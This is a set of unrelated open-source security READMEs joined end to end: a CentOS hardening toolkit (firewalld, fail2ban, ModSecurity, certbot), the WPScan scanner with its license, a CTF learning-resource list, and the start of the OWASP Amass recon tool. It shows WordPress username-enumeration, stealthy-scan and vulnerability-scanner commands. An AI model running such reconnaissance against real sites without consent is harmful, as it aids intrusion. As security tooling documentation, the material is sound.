Disable {} ---; systemctl stop {} ; systemctl disable {}; echo" ``` # Quick Install ## Configuration * Download and run check ```bash dnf install -y git git clone https://github.com/charlietag/os_security.git ``` * Make sure config files exists , you can copy from sample to **modify**. ```bash cd databag ls |xargs -I{} bash -c "cp {} \$(echo {}|sed 's/\.sample//g')" ``` * Mostly used configuration : * **DEV** use (server in **Local**) * **NO NEED** to setup config, just `./start -a` without config, by default, the following will be executed ```bash functions/ ├── F_00_list_os_users ├── F_01_CHECK_01_os ├── F_01_CHECK_02_failed_login ├── F_01_CHECK_03_last_login ├── F_01_CHECK_04_ssh_config ├── F_02_PKG_02_install_perf_tools ├── F_02_PKG_04_firewalld_01_install ├── F_02_PKG_05_fail2ban_01_install ``` * **DEV** use (server in **Cloud**) * It would be better to work with **VPS Firewall** for more secure enviroment * Firewalld + Fail2ban + **VPS Firewall (Vultr / DigitalOcean)** ```bash databag/ ├── F_02_PKG_01_install_log_analyzer.cfg ├── F_02_PKG_04_firewalld_02_setup.cfg (rementer add customized port for dev, like 8000 for laravel, 3000 for rails) ├── F_02_PKG_05_fail2ban_02_setup.cfg ├── F_02_PKG_05_fail2ban_03_nginx_check_banned.cfg ├── F_02_PKG_07_nginx_01_ssl_enhanced.cfg ├── F_02_PKG_08_redmine_01_fail2ban.cfg ├── F_03_CHECK_01_check_scripts.cfg └── _postfix.cfg ``` * ~~F_02_PKG_21_install_clamav.cfg~~ * ~~_nginx_modules.cfg~~ * **Production** use (server in **Local**) ```bash databag/ ├── F_02_PKG_01_install_log_analyzer.cfg └── _postfix.cfg ``` * ~~F_02_PKG_21_install_clamav.cfg~~ * **Production** use (server in **Cloud**) ```bash databag/ ├── _certbot.cfg ├── F_02_PKG_01_install_log_analyzer.cfg ├── F_02_PKG_04_firewalld_02_setup.cfg ├── F_02_PKG_05_fail2ban_02_setup.cfg ├── F_02_PKG_05_fail2ban_03_nginx_check_banned.cfg ├── F_02_PKG_07_nginx_01_ssl_enhanced.cfg ├── F_02_PKG_07_nginx_02_ssl_site_config.cfg ├── F_02_PKG_08_redmine_01_fail2ban.cfg ├── F_03_CHECK_01_check_scripts.cfg └── _postfix.cfg ``` * ~~F_02_PKG_21_install_clamav.cfg~~ * ~~_nginx_modules.cfg~~ * Verify config files (with syntax color). ```bash cd databag echo ; \ ls *.cfg | xargs -I{} bash -c " \ echo -e '\e[0;33m'; \ echo ---------------------------; \ echo {}; \ echo ---------------------------; \ echo -n -e '\033[00m' ; \ echo -n -e '\e[0;32m'; \ cat {} | grep -vE '^\s*#' |sed '/^\s*$/d'; \ echo -e '\033[00m' ; \ echo " ``` * Verify **ONLY modified** config files (with syntax color). ```bash cd databag echo ; \ ls *.cfg | xargs -I{} bash -c " \ echo -e '\e[0;33m'; \ echo ---------------------------; \ echo {}; \ echo ---------------------------; \ echo -n -e '\033[00m' ; \ echo -n -e '\e[0;32m'; \ cat {} | grep -v 'plugin_load_databag.sh' | grep -vE '^\s*#' |sed '/^\s*$/d'; \ echo -e '\033[00m' ; \ echo " ``` ## Installation * First time finish [os_preparation](https://github.com/charlietag/os_preparation), be sure to do a **REBOOT**, before installing [os_security](https://github.com/charlietag/os_security) * Run **ALL** to do the following with one command * ./start -a * Run security check * Install security package "**firewalld**" , "**fail2ban**" , "**letsencrypt**" , "**nginx waf**" , "**nginx header**" * ~~To avoid running **ALL**, to **APPLY** and **DESTROY** **letsencrypt** cert **at the same time**.~~ * ~~DO NOT run ***./start.sh -a***~~ # Run Security Check ## Basic os check * Command ```bash ./start.sh -i \ F_00_debug \ F_00_list_os_users \ F_01_CHECK_01_os \ F_01_CHECK_02_failed_login \ F_01_CHECK_03_last_login \ F_01_CHECK_04_ssh_config \ F_01_CHECK_05_hosts_config \ ... ``` * Check OS * Verify os basic command (ls,cp, etc..) using command "rpm -Vf" * Check failed loging * Check failed attempt ssh login * Check ssh config * Check if root permit * Check if ssh port set to default 22 * List os users * Check current how many common user created * Check last login * Check latest successfully login * Check hosts file (/etc/hosts) ```bash 127.0.0.1 original content ::1 original content 127.0.0.1 $(hostname) ::1 $(hostname) ``` # Installed Packages * Firewalld * Allowed port * http * https * 2222 * Fail2ban * Default filtered * sshd (mode=aggressive) * nginx-limit-req * nginx-botsearch # Quick Note - Package ## Nginx module - os_preparation * limit_req_zone * This is installed by default on my *os_preparation repo* * **[Link](https://github.com/charlietag/os_preparation/blob/master/templates/F_06_01_setup_nginx_include/opt/nginx/conf/include.d/limit_req_zone.conf)** * This would prevent your server from **DDOS** attacks. ## NGINX 3rd Party Modules - os_security https://www.nginx.com/resources/wiki/modules/ * Headers More ```bash more_set_headers "Server: CharlieTag"; # Default=> Nginx: "nginx" , Apache: "Apache" ``` * ModSecurity ```bash ... modsecurity on; ... ``` * ModSecurity - supported policies * OWASP CRS * https://github.com/SpiderLabs/owasp-modsecurity-crs * Memory consumption * 100 MB / per nginx process * Should reference Azure config, to Avoid False Positive * https://docs.microsoft.com/en-us/azure/application-gateway/waf-overview ```bash curl -s https://docs.microsoft.com/zh-tw/azure/application-gateway/waf-overview |grep -Eo "REQUEST-[[:digit:]]+" |sort -n | uniq | sed ':a;N;$!ba;s/\n/|/g' ``` * if you really need OWASP * if you have time to maintain WAF rules (OWASP-CRS) yourself * Reference: REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example , RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example * REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example * Usage ```bash # ModSecurity Rule Exclusion: Disable all SQLi and XSS rules SecRule REQUEST_FILENAME "@beginsWith /admin" \ "id:1004,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveById=941000-942999" # This would cause error # ...no SecRule specified... # ctl:ruleRemoveById=941000-942999" ``` * RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example * Usage ```bash SecRuleRemoveById 949100 949110 959100 ``` * COMODO * https://waf.comodo.com * Memory consumption * 300 MB / per nginx process * Recommended: COMODO (register an account for 1-year-free, require renew 1-year-free order every year) * OWSASP would have false positive while: * Wordpress , updating articles * Redmine , Click between pages * Website Vulnerability Scanner * nikto * Install ```bash dnf install -y nikto ``` * Start to scan ```bash nikto -h myrails.centos8.localdomain ``` * skipfish * Install ```bash dnf install -y skipfish ``` * Start to scan (output_result_folder must be an empty folder) ```bash skipfish -o output_result_folder http://myrails.centos8.localdomain ``` ## Firewalld usage *- Default block all traffic, except rules you define below* * Allow/revoke specific service ```basn firewall-cmd --add-service=http --permanent firewall-cmd --remore-service=http --permanent ``` * Allow/revoke specific port ```bash firewall-cmd --add-port=2222/tcp --permanent firewall-cmd --remove-port=2222/tcp --permanent ``` * List all current rules setting ```bash firewall-cmd --list-all ``` * After setup done with argument "**--permanent**", all rules save into the following file by default ```bash /etc/firewalld/zone/public.xml ``` * So reload firewalld to activate setting. ```bash firewall-cmd --reload ``` * Services(http,https) defines in ```bash /usr/lib/firewalld/services/* ``` * After running this installation, your firewalld will only allow http , https , ***customized ssh port*** ## Fail2ban usage *- Setting: port, in fail2ban configuration is based on firewalld services name.* *- Determine if rules of fail2ban is inserted into nft via firewalld command* * Confirm fail2ban works with **nft** well ```bash nft list ruleset | grep {banned_ip} ``` * List fail2ban status ```bash fail2ban-client status ``` * List detailed status for specific **JAIL NAME**, including banned IP ```bash fail2ban-client status nginx-botsearch ``` * Unban banned ip for specific **JAIL NAME** ```bash fail2ban-client set nginx-botsearch unbanip 192.168.1.72 ``` * Unban banned specific ip for all **JAIL NAME** ```bash fail2ban-client unban 192.168.1.72 ... 192.168.1.72 ``` * List banned ip timeout for specific **JAIL NAME** ```bash ipset list fail2ban-nginx-botsearch ``` * Fail2ban keeps showing WARN ```bash 2019-12-11 16:23:53,108 fail2ban.ipdns [4812]: WARNING Unable to find a corresponding IP address for xxx.xxx.xxx.xxx.server.com: [Errno -5] No address associated with hostname ``` * ~~Solution~~ * ~~fail2ban-client unban --all~~ * ~~fail2ban-client restart~~ * Root cause (Not verified) * fail2ban will dns lookup / dns reserve lookup hostname, this will trigger this error message * fail2ban will not dns lookup / dns reserve lookup 127.0.0.1 * And why VM test server will not show this err message * The hostname of VM test server is not in `/etc/hosts` but also not in dns. So all the results when dns resolves. are `NXDOMAIN`, the same result... PASS * Solution 1 * make sure `hostname` is in `/etc/hosts` (**both ipv4 and ipv6 is needed**) ```bash # cat /etc/hosts 127.0.0.1 web.example.com ::1 web.example.com ``` * Solution 2 * make sure DNS record is correct * A record * `web.example.com A xxx.xxx.xxx.xxx` * PTR record (reverse record) * `xxx.xxx.xxx.xxx PTR web.example.com` # Quick Note - Fail2ban flow * **(Procedure) Be sure to start *"Firewalld / Fail2ban"* in the following order** ```bash systemctl stop fail2ban systemctl stop firewalld systemctl start firewalld systemctl start fail2ban ``` - The following flow are executed automatically by **Fail2ban** * Create [ipset-nmae] *(What actually done behind)* ```bash ipset create <ipmset> hash:ip timeout <bantime> ``` * Reject all traffic with [ipset-name] *(What actually done behind)* ```bash firewall-cmd --direct --add-rule <family> filter <chain> 0 -p <protocol> -m multiport --dports <port> -m set --match-set <ipmset> src -j <blocktype> ``` * Parse log * **Found** illigal IP * **Ban** IP using **ipset** with timeout argument *(What actually done behind)* ```bash ipset add <ipmset> <ip> timeout <bantime> -exist ``` # Quick Note - Fail2ban all detailed status * *List all jail detailed status in faster way* **Command** ```bash # fail2ban-client status|tail -n 1 | cut -d':' -f2 | sed "s/\s//g" | tr ',' '\n' |xargs -I{} bash -c "echo \"----{}----\" ;fail2ban-client status {} ; echo " ``` **Result** ```bash ----nginx-botsearch---- Status for the jail: nginx-botsearch |- Filter | |- Currently failed: 0 | |- Total failed: 0 | `- File list: /var/log/nginx/error.log /var/log/nginx/default.error.log /var/log/nginx/redmine.centos8.localdomain.error.log /var/log/nginx/myrails.centos8.localdomain.error.log /var/log/nginx/mylaravel.centos8.localdomain.error.log `- Actions |- Currently banned: 1 |- Total banned: 1 `- Banned IP list: 10.255.255.254 ----nginx-limit-req---- Status for the jail: nginx-limit-req |- Filter | |- Currently failed: 0 | |- Total failed: 0 | `- File list: /var/log/nginx/error.log /var/log/nginx/default.error.log /var/log/nginx/redmine.centos8.localdomain.error.log /var/log/nginx/myrails.centos8.localdomain.error.log /var/log/nginx/mylaravel.centos8.localdomain.error.log `- Actions |- Currently banned: 1 |- Total banned: 1 `- Banned IP list: 10.255.255.254 ----nginx-modsecurity---- Status for the jail: nginx-modsecurity |- Filter | |- Currently failed: 0 | |- Total failed: 1 | `- File list: /var/log/nginx/error.log /var/log/nginx/default.error.log /var/log/nginx/redmine.centos8.localdomain.error.log /var/log/nginx/myrails.centos8.localdomain.error.log /var/log/nginx/mylaravel.centos8.localdomain.error.log `- Actions |- Currently banned: 1 |- Total banned: 1 `- Banned IP list: 10.255.255.254 ----nginx-redmine---- Status for the jail: nginx-redmine |- Filter | |- Currently failed: 0 | |- Total failed: 0 | `- File list: /home/rubyuser/rails_sites/redmine/log/production.log `- Actions |- Currently banned: 1 |- Total banned: 1 `- Banned IP list: 10.255.255.254 ----sshd---- Status for the jail: sshd |- Filter | |- Currently failed: 0 | |- Total failed: 0 | `- Journal matches: _SYSTEMD_UNIT=sshd.service + _COMM=sshd `- Actions |- Currently banned: 1 |- Total banned: 1 `- Banned IP list: 10.255.255.254 ``` # Install SSL (Letsencrypt) - A+ ## Setup Nginx **This will automatically setup after installation** **Also you will get a score "A+" in [SSLTEST](https://www.ssllabs.com/ssltest)** **Default : TLS 1.2 1.3 enabled** ## Certbot prerequisite **You will need 2 privileges** 1. Web server control , to install ssl certificates. 1. DNS control , to do ACME verification using TXT record. ## Certbot usage * Sign certificate (**RECOMMEND**), verified by DNS txt record ```bash certbot-auto --agree-tos -m $certbot_email --no-eff-email certonly --manual --preferred-challenges dns -d {domain} ``` * Sign certificate , verified by web server root ```bash certbot-auto --agree-tos -m $certbot_email --no-eff-email certonly --webroot -w /{PATH}/laravel/public -d {domain} -n ``` * Display all certificates ```bash certbot-auto certificates ``` * Renew all certificates ```bash certbot-auto renew ``` * Revoke and delete certificate ```bash certbot-auto revoke --cert-path /etc/letsencrypt/live/{domain}/cert.pem certbot-auto delete --cert-name {domain} ``` * New site - url : gen nginx site config + apply letsencrypt ssl only ```bash ./start.sh -i F_02_PKG_06_nginx_02_ssl_site_config ``` **Before going on, be sure http port is reachable, otherwise webroot will fail (limitation for webroot verification!)** ```bash ./start.sh -i F_02_PKG_07_certbot_02_apply_webroot ``` * New site - url (wildcard) : gen nginx site config + apply letsencrypt ssl only ```bash ./start.sh -i F_02_PKG_06_nginx_02_ssl_site_config ./start.sh -i F_02_PKG_07_certbot_02_apply_dns-cloudflare ``` # Log analyzer ## GoAccess usage *- Generate nginx http log report in html.* **Reference the official description** [GoAccess](https://goaccess.io/) ```bash cat xxx.access.log | goaccess > xxx.html ``` ## Logwatch usage *- View log analysis report.* ```bash logwatch ``` ## pflogsumm usage (not installed by default, use logwatch instead) *- View log analysis of postfix.* ```bash /usr/sbin/pflogsumm -d yesterday /var/log/maillog ``` # Performance monitor ## Glances usage (not installed by default, not provide by CentOS 8 - base,epel,appstream) *- Just like command "top", but more than that.* ```bash glances ``` ## Iotop usage *- Just like command "top", but just for IO.* ```bash iotop ``` # CHANGELOG * 2017/03/04 * Add Firewalld & Fail2ban installation and setting to avoid DDOS. * Firewalld * Fail2ban * 2017/03/18 * Integrate ssl and certs into nginx * Using letsencrypt and certbot * 2017/03/26 * To enhance security, add log analyzer, and enable mail server to mail out alert mail * posfix * goaccess * logwatch (customized for optnginx) * To know more about server performance * iotop * glances * 2017/10/20 * Add postfix log analyzer - pflogsumm (postfix-perl-scripts) * 2017/10/27 * Add Nginx http2 (ALPN) support under CentOS 7.4 * This change is because openssl version "1.0.2" is supported by default in CentOS 7.4 * 2018/03/16 * Add Letsencrypt wildcard ssl support * 2018/07/19 * Migrate rails ap server from passenger to puma * This movement will make deployment easier, especial security for most people. * Most different effects * Nginx config file no longer under /opt/nginx. Instead, /etc/nginx * Deprecated command * systemctl start optnginx * New command * systemctl start nginx * 2018/12/13 * ~~Adding Nginx WAF~~ finished at 2019/08/25 * 2019/04/07 * More tools about server performance * htop * nmon * dstat * 2019/08/25 * Add Nginx module 'ngx_http_headers_more_filter_module.so' to change server tag ('Server:Nginx' -> 'Server: CustomizedName') * Finished intergrating Nginx WAF module into os_security * Modules * libmodsecurity.so * ngx_http_modsecurity_module.so (ModSecurity-nginx connector) * WAF Policies * OWASP CRS (https://github.com/SpiderLabs/owasp-modsecurity-crs) * COMODO (register free account required: https://waf.comodo.com) * Finished intergrating Nginx WAF with Fail2ban * nginx-modsecurity (modified from apache-modsecurity) * 2019/11/20 * Add fail2ban rules for redmine (Failed Login) * 2019/11/27 * Add ClamAV installation and setup * Ref. https://www.clamav.net/ * 2019/12/06 * tag: v0.1.0 * 2019/12/07 * tag: v0.1.1 * changelog: https://github.com/charlietag/os_security/compare/v0.1.0...v0.1.1 * 2019/12/11 * tag: v0.1.2 * changelog: https://github.com/charlietag/os_security/compare/v0.1.1...v0.1.2 * Fix fail2ban version v0.10 (sshd-ddos is integrated into sshd) issue * 2019/12/11 * tag: v0.1.3 * changelog: https://github.com/charlietag/os_security/compare/v0.1.2...v0.1.3 * tag: v0.1.4 * changelog: https://github.com/charlietag/os_security/compare/v0.1.3...v0.1.4 * Add check if hostname is in /etc/hosts for fail2ban use * 2019/12/22 * tag: v0.1.5 * changelog: https://github.com/charlietag/os_security/compare/v0.1.4...v0.1.5 * change default clamav scan path by cron job * 2020/01/17 * tag: v0.2.0 * changelog: https://github.com/charlietag/os_security/compare/v0.1.5...v0.2.0 * ssl_protocols TLSv1.2 supported only * 2020/06/11 * tag: v1.0.0 * changelog: https://github.com/charlietag/os_security/compare/v0.2.0...v1.0.0 * CentOS 8 - changes for CentOS 8 * Rename all centos7 related to centos8 in all config files * Command "yum" -> "dnf" * Package: goaccess * Manually compile, because CentOS8 (epel, base, appstream) doesn't provide this package * clamscan * show error message if memroy is insufficient * TLS 1.3 (Nginx) - Enabled by default * ModSecurity * v3.0.3 -> v3.0.4 * Nginx WAF Rules - cwaf_charlietag (comodo waf clone for bad stability of cwaf site) by default * iptables -> nft * check_fail2ban.sh * ipset list check -> nft list ruleset check * Fail2ban default bantime * ban IP for 30 days - 2592000 * Other changes for CentOS 8 (reference changelog via link above) * tag: v1.0.1 * changelog: https://github.com/charlietag/os_security/compare/v1.0.0...v1.0.1 * postfix config -> **compatibility_level = 2** * 2020/06/11 * tag: v1.0.2 * changelog: https://github.com/charlietag/os_security/compare/v1.0.1...v1.0.2 * small changes for _postfix.cfg * 2020/06/14 * tag: v1.0.3 * changelog: https://github.com/charlietag/os_security/compare/v1.0.2...v1.0.3 * DO NOT restart Nginx if Nginx is disabled (Otherwise, sometimes I will be shocked if it's started automatically) * When upgrading Nginx related (WAF / Header / Nginx) * Check banned IP by fail2ban (f2b_nginx_check_banned.sh) * Renew certificates (certbot-auto_renew.sh) * 2021/01/30 * tag: v2.0.0 * changelog: https://github.com/charlietag/os_security/compare/v1.0.3...v2.0.0 * install certbot (git clone certbot-auto => dnf install certbot using repo EPEL) * add comment for puma TCP socket in nginx sample ssl config (rails) * make sure http://url is alive before certbot issuing certs via webroot * fix nginx dynamic modules compatibility * fix for installing Nginx via both (nginx.org / AppStream) * 2021/02/02 * tag: v2.0.1 * changelog: https://github.com/charlietag/os_security/compare/v2.0.0...v2.0.1 * Fixes typo * To avoid failing to start fail2ban, start and stop nginx to make sure log of nginx exists... * 2021/02/03 * tag: v2.0.2 * changelog: https://github.com/charlietag/os_security/compare/v2.0.1...v2.0.2 * Add more displayed messages while setup fail2ban * 2021/02/06 * tag: v2.0.3 * changelog: https://github.com/charlietag/os_security/compare/v2.0.2...v2.0.3 * Change for newer version of git * 2021/02/07 * tag: v2.0.4 * changelog: https://github.com/charlietag/os_security/compare/v2.0.3...v2.0.4 * Few changes for more readable messages * 2021/06/22 * tag: v2.0.5 * changelog: https://github.com/charlietag/os_security/compare/v2.0.4...v2.0.5 * Fix nginx issue while building plugin "header" "libmodsecurity" * 2021/11/01 * tag: v2.0.6 * changelog: https://github.com/charlietag/os_security/compare/v2.0.5...v2.0.6 * make sure locale (LC_ALL, LANG) is set to "en_US.UTF-8" to avoid errors while compiling programs ```bash export LC_ALL="en_US.UTF-8" export LANG="en_US.UTF-8" ``` * 2021/11/02 * tag: v2.0.7 * changelog: https://github.com/charlietag/os_security/compare/v2.0.6...v2.0.7 * locale (LC_ALL, LANG) * ask user to disable terminal locale setting * 2021/11/04 * tag: v2.0.8 * changelog: https://github.com/charlietag/os_security/compare/v2.0.7...v2.0.8 * Add Example credentials file using restricted API Token (recommended) * tag: v2.0.9 * changelog: https://github.com/charlietag/os_security/compare/v2.0.8...v2.0.9 * Fix nginx header package download path * 2022/02/14 * tag: v2.0.10 * changelog: https://github.com/charlietag/os_security/compare/v2.0.9...v2.0.10 * Change default nginx modsecurity upload limit config (Nginx default: 100 MB, set modsecurity rule to 500 MB, non-uploading-file-request to 10 MB) ``` SecRequestBodyLimit 524288000 SecRequestBodyNoFilesLimit 10485760 ``` * 2022/04/17 * tag: v2.1.0 * changelog: https://github.com/charlietag/os_security/compare/v2.0.10...v2.1.0 * Refine doc * Do not install packages by default * ClamAV * ~~F_02_PKG_21_install_clamav.cfg~~ * Nginx modules (WAF, Nginx more headers) * ~~_nginx_modules.cfg~~ * 2022/10/11 * tag: v3.0.0 * changelog: https://github.com/charlietag/os_security/compare/v2.1.0...v3.0.0 * Migrate to CentOS Stream 9 * goaccess (epel ~~manually compile~~) * 2023/01/13 * tag: v3.0.1 * changelog: https://github.com/charlietag/os_security/compare/v3.0.0...v3.0.1 * xargs `-i` is deprecated, use `-I{}` instead
![alt text](https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/images/wpscan_logo.png "WPScan - WordPress Security Scanner") [![Gem Version](https://badge.fury.io/rb/wpscan.svg)](https://badge.fury.io/rb/wpscan) [![Build Status](https://travis-ci.org/wpscanteam/wpscan.svg?branch=master)](https://travis-ci.org/wpscanteam/wpscan) [![Code Climate](https://codeclimate.com/github/wpscanteam/wpscan/badges/gpa.svg)](https://codeclimate.com/github/wpscanteam/wpscan) [![Patreon Donate](https://img.shields.io/badge/patreon-donate-green.svg)](https://www.patreon.com/wpscan) # INSTALL ## Prerequisites: - Ruby >= 2.3 - Recommended: latest - Curl >= 7.21 - Recommended: latest - FYI the 7.29 has a segfault - RubyGems - Recommended: latest ### From RubyGems: ``` gem install wpscan ``` ### From sources: Prerequisites: Git ``` git clone https://github.com/wpscanteam/wpscan cd wpscan/ bundle install && rake install ``` # Docker Pull the repo with ```docker pull wpscanteam/wpscan``` Enumerating usernames ``` docker run -it --rm wpscanteam/wpscan --url https://target.tld/ --enumerate u ``` Enumerating a range of usernames ``` docker run -it --rm wpscanteam/wpscan --url https://target.tld/ --enumerate u1-100 ``` ** replace u1-100 with a range of your choice. # Usage ```wpscan --url blog.tld``` This will scan the blog using default options with a good compromise between speed and accuracy. For example, the plugins will be checked passively but their version with a mixed detection mode (passively + aggressively). Potential config backup files will also be checked, along with other interesting findings. If a more stealthy approach is required, then ```wpscan --stealthy --url blog.tld``` can be used. As a result, when using the ```--enumerate``` option, don't forget to set the ```--plugins-detection``` accordingly, as its default is 'passive'. For more options, open a terminal and type ```wpscan --help``` (if you built wpscan from the source, you should type the command outside of the git repo) The DB is located at ~/.wpscan/db WPScan can load all options (including the --url) from configuration files, the following locations are checked (order: first to last): * ~/.wpscan/cli_options.json * ~/.wpscan/cli_options.yml * pwd/.wpscan/cli_options.json * pwd/.wpscan/cli_options.yml If those files exist, options from them will be loaded and overridden if found twice. e.g: ~/.wpscan/cli_options.yml: ``` proxy: 'http://127.0.0.1:8080' verbose: true ``` pwd/.wpscan/cli_options.yml: ``` proxy: 'socks5://127.0.0.1:9090' url: 'http://target.tld' ``` Running ```wpscan``` in the current directory (pwd), is the same as ```wpscan -v --proxy socks5://127.0.0.1:9090 --url http://target.tld``` Enumerating usernames ``` wpscan --url https://target.tld/ --enumerate u ``` Enumerating a range of usernames ``` wpscan --url https://target.tld/ --enumerate u1-100 ``` ** replace u1-100 with a range of your choice. # PROJECT HOME [https://wpscan.org](https://wpscan.org) # VULNERABILITY DATABASE [https://wpvulndb.com](https://wpvulndb.com) # LICENSE ## WPScan Public Source License The WPScan software (henceforth referred to simply as "WPScan") is dual-licensed - Copyright 2011-2019 WPScan Team. Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below. ### 1. Definitions 1.1 "License" means this document. 1.2 "Contributor" means each individual or legal entity that creates, contributes to the creation of, or owns WPScan. 1.3 "WPScan Team" means WPScan’s core developers. ### 2. Commercialization A commercial use is one intended for commercial advantage or monetary compensation. Example cases of commercialization are: - Using WPScan to provide commercial managed/Software-as-a-Service services. - Distributing WPScan as a commercial product or as part of one. - Using WPScan as a value added service/product. Example cases which do not require a commercial license, and thus fall under the terms set out below, include (but are not limited to): - Penetration testers (or penetration testing organizations) using WPScan as part of their assessment toolkit. - Penetration Testing Linux Distributions including but not limited to Kali Linux, SamuraiWTF, BackBox Linux. - Using WPScan to test your own systems. - Any non-commercial use of WPScan. If you need to purchase a commercial license or are unsure whether you need to purchase a commercial license contact us - [email protected]. Free-use Terms and Conditions; ### 3. Redistribution Redistribution is permitted under the following conditions: - Unmodified License is provided with WPScan. - Unmodified Copyright notices are provided with WPScan. - Does not conflict with the commercialization clause. ### 4. Copying Copying is permitted so long as it does not conflict with the Redistribution clause. ### 5. Modification Modification is permitted so long as it does not conflict with the Redistribution clause. ### 6. Contributions Any Contributions assume the Contributor grants the WPScan Team the unlimited, non-exclusive right to reuse, modify and relicense the Contributor's content. ### 7. Support WPScan is provided under an AS-IS basis and without any support, updates or maintenance. Support, updates and maintenance may be given according to the sole discretion of the WPScan Team. ### 8. Disclaimer of Warranty WPScan is provided under this License on an “as is” basis, without warranty of any kind, either expressed, implied, or statutory, including, without limitation, warranties that the WPScan is free of defects, merchantable, fit for a particular purpose or non-infringing. ### 9. Limitation of Liability To the extent permitted under Law, WPScan is provided under an AS-IS basis. The WPScan Team shall never, and without any limit, be liable for any damage, cost, expense or any other payment incurred as a result of WPScan's actions, failure, bugs and/or any other interaction between WPScan and end-equipment, computers, other software or any 3rd party, end-equipment, computer or services. ### 10. Disclaimer Running WPScan against websites without prior mutual consent may be illegal in your country. The WPScan Team accept no liability and are not responsible for any misuse or damage caused by WPScan. ### 11. Trademark The "wpscan" term is a registered trademark. This License does not grant the use of the "wpscan" trademark or the use of the WPScan logo.
# CTF_resources Hi, guys. In this repo, ill be posting resources related to different categories of CTF challenges. I use Ubuntu to solve chals. It is a Linux environment using BASH (Bourne Again Shell) i.e a shell and command language interpreter for a GNU operating system. HELPFUL PLAYLIST: https://www.youtube.com/playlist?list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN https://www.roppers.org/courses/take/ctf/texts/32594780-what-you-will-learn https://www.youtube.com/watch?v=uIkxsBgkpj8 https://www.hackthebox.com/ https://www.cybrary.it/blog/strategies-to-win-a-ctf-how-to-approach-a-jeopardy-style-ctf/ https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ https://ctflearn.com/dashboard RECOMMENDED VIDEO RESOURCES : ```py 1. Infosec Institute — Cybersecurity awareness. 2. Black Hat — Technical cybersecurity conferences. 3. Bugcrowd — Bug bounty methodology and interviews. 4. InfoSec Live — Everything from tutorials to interviews. 5. David Bombal — Everything cybersecurity related. 6. Nahamsec — Educational hacking and bug bounty videos. 7. Computerphile — Covers basic concepts and techniques. 8. InsiderPHD — How to get started with bug bounty hunting. 9. Security Weekly — Interviews with cybersecurity figures. 10. John Hammond — Malware analysis, programming, and careers. 11. Peter Yaworski — Web-application hacking tips and interviews. 12. IppSec — Labs and capture-the-flag tutorials, HackTheBox etc. (also recommend checking out https://ippsec.rocks/, collection of all his walkthroughs and you can search topics) 13. 13Cubed — Videos on tools, forensics, and incident response. 14. HackerSploit — Penetration testing, web-application hacking. 15. STÖK — Videos on tools, vulnerability analysis, and methodology. 16. Security Now — Cybercrime news, hacking and web-application security. 17. LiveOverflow — Involves hacking, write-up videos, and capture-the-flags. 18. The Cyber Mentor — Ethical hacking, web-application hacking, and tools. 19. Joe Collins — Everything Linux related, including tutorials and guides. 20. Null Byte — Cybersecurity for ethical hackers, and computer scientists. 21. The PC Security Channel — Windows security, malware news, and tutorials. 22. Simply Cyber — Helps people with cybersecurity career development. 23. Network Chuck — Everything cybersecurity related. 24. BlackPerl — Malware analysis, forensics and incident response. 25. Professor Messer — Guides covering certifications. 26. Hak5 — General cybersecurity coverage. 27. Alh4zr3d - Red teamer that does engaging CTF twitch streams and uploads to Youtube as well 28. Mttaggart - Michael Taggart does twitch streams and uploads to Youtube as well, more of a "variety" in terms of content, blue team, homelab, red team, coding, etc. 29. Tib3rius - Very skilled web app pentester, does twitch streams on web app pentesting and breaking into the industry, security discussion, etc. 30. UHC (Ultimate Hacking Championships) - twitch streams held for CTF competitions (usually Sundays in the evening EST), there's a UHC English and Brazil/Portuguese, many of the CTF creators and hosts are Brazil-based/Portuguese, English channel usually has DualCore as one of the hosts and guests from all around the world in security. ``` --- Thank you
# [![OWASP Logo](./images/owasp_logo.png) OWASP Amass](https://owasp.org/www-project-amass/) <p align="center"> <img src="https://github.com/owasp-amass/amass/blob/master/images/amass_video.gif"> </p> [![OWASP Flagship](https://img.shields.io/badge/owasp-flagship%20project-48A646.svg)](https://owasp.org/projects/#sec-flagships) [![GitHub Release](https://img.shields.io/github/release/owasp-amass/amass)](https://github.com/owasp-amass/amass/releases/latest) [![Docker Images](https://img.shields.io/docker/pulls/caffix/amass.svg)](https://hub.docker.com/r/caffix/amass) [![Follow on Twitter](https://img.shields.io/twitter/follow/owaspamass.svg?logo=twitter)](https://twitter.com/owaspamass) [![Chat on Discord](https://img.shields.io/discord/433729817918308352.svg?logo=discord)](https://discord.gg/HNePVyX3cp) ![GitHub Test Status](https://github.com/owasp-amass/amass/workflows/tests/badge.svg) [![GoDoc](https://pkg.go.dev/badge/github.com/owasp-amass/amass/v4?utm_source=godoc)](https://pkg.go.dev/github.com/owasp-amass/amass/v4) [![License](https://img.shields.io/badge/license-apache%202-blue)](https://www.apache.org/licenses/LICENSE-2.0) [![Go Report](https://goreportcard.com/badge/github.com/owasp-amass/amass)](https://goreportcard.com/report/github.com/owasp-amass/amass) [![CodeFactor](https://www.codefactor.io/repository/github/owasp-amass/amass/badge)](https://www.codefactor.io/repository/github/owasp-amass/amass) [![Maintainability](https://api.codeclimate.com/v1/badges/234e4885e406953f91d0/maintainability)](https://codeclimate.com/github/owasp-amass/amass/maintainability) [![codecov](https://codecov.io/gh/owasp-amass/amass/branch/master/graph/badge.svg?token=zoPKxvLT1n)](https://codecov.io/gh/owasp-amass/amass) The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques. **Information Gathering Techniques Used:** | Technique | Data Sources | |:-------------|:-------------| | APIs | 360PassiveDNS, Ahrefs, AnubisDB, BeVigil, BinaryEdge, BufferOver, BuiltWith, C99, Chaos, CIRCL, DNSDB, DNSRepo, Deepinfo, Detectify, FOFA, FullHunt, GitHub, GitLab, GrepApp, Greynoise, HackerTarget, Hunter, IntelX, LeakIX, Maltiverse, Mnemonic, Netlas, Pastebin, PassiveTotal, PentestTools, Pulsedive, Quake, SOCRadar, Searchcode, Shodan, Spamhaus, Sublist3rAPI, SubdomainCenter, ThreatBook, ThreatMiner, URLScan, VirusTotal, Yandex, ZETAlytics, ZoomEye | | Certificates | Active pulls (optional), Censys, CertCentral, CertSpotter, 